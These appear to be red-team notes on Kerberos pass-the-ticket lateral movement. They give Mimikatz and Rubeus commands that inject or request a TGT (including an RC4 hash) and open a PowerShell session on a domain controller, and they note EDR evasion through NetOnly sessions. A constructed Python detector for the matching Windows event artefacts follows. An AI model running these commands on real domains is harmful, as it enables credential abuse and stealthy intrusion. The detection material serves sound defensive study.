PowerShell Remoting

PowerShell remoting is a feature that lets users run PowerShell commands or scripts on remote computers. It is built on the WinRM service, so the session below (Enter-PSSession) authenticates with whatever Kerberos ticket is currently loaded in the caller's logon session.

Mimikatz

kerberos::ptt "C:\Users\carni7\Desktop\Mimikatz\[0;7f830]-5-2-43f10000-carni7@krbtgt-amogus.kek.kirbi"
Enter-PSSession -ComputerName DC01

Rubeus

Rubeus.exe asktgt /domain:amogus.kek /user:carni7 /rc4:1293uo1uwfoi1hw081 /ptt
Enter-PSSession -ComputerName DC01

Rubeus NetOnly Session

We can use the createnetonly option to spawn a NetOnly logon session, which has no additional rights on the local machine but can authenticate to network services with the credentials supplied to it. Afterwards we can use Rubeus's /ptt option to insert a TGT into that session. NetOnly sessions are less detectable and can evade some EDRs.

Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
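From the detection side, the two techniques above leave distinct Security-log artefacts: an asktgt request keyed with an RC4 hash (/rc4) shows up as a 4768 TGT request with TicketEncryptionType 0x17, and a createnetonly (runas /netonly-style) session is recorded as a 4624 logon with LogonType 9 (NewCredentials). The script below is an added example, not part of the original notes or of Rubeus; the event records, usernames and hosts in it are constructed, and the field names mirror the EventData fields of the Windows Security log.

```python
"""Flag constructed Security events matching the asktgt /rc4 and createnetonly artefacts."""
from typing import Dict, List, Optional

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "4624", "LogonType": "9", "LogonProcessName": "seclogo",
     "TargetUserName": "carni7", "WorkstationName": "WS01"},
    {"EventID": "4624", "LogonType": "10", "LogonProcessName": "User32",
     "TargetUserName": "carni7", "WorkstationName": "WS01"},
    {"EventID": "4768", "TargetUserName": "carni7", "TicketEncryptionType": "0x17",
     "IpAddress": "10.0.0.5", "Status": "0x0"},
    {"EventID": "4768", "TargetUserName": "svc-backup", "TicketEncryptionType": "0x12",
     "IpAddress": "10.0.0.6", "Status": "0x0"},
]

NEW_CREDENTIALS_LOGON = "9"   # LogonType 9: credentials used only for outbound network access
RC4_HMAC = "0x17"             # TicketEncryptionType 0x17: RC4-HMAC, keyed by the account's NT hash
AES_TYPES = {"0x11", "0x12"}  # AES128 / AES256: what a healthy domain should be issuing


def flag_event(ev: Dict[str, str]) -> Optional[str]:
    """Return a short finding string for a suspicious event, or None for a benign one."""
    eid = ev.get("EventID")
    if eid == "4624" and ev.get("LogonType") == NEW_CREDENTIALS_LOGON:
        # Also produced by legitimate runas /netonly: triage by process, user and frequency.
        return (f"netonly-logon user={ev.get('TargetUserName')} "
                f"host={ev.get('WorkstationName')} proc={ev.get('LogonProcessName')}")
    etype = ev.get("TicketEncryptionType", "").lower()
    if eid == "4768" and etype == RC4_HMAC and ev.get("Status") == "0x0":
        # Only meaningful where accounts normally get AES tickets; baseline first.
        return f"rc4-tgt-request user={ev.get('TargetUserName')} from={ev.get('IpAddress')}"
    return None


def scan(events: List[Dict[str, str]]) -> List[str]:
    """Run flag_event over a list of events and keep the findings in input order."""
    return [f for f in (flag_event(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Both signals are heuristics: LogonType 9 also fires for administrators using runas /netonly, and RC4 TGTs are normal in domains that never enabled AES for the account, so compare against a baseline before alerting.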
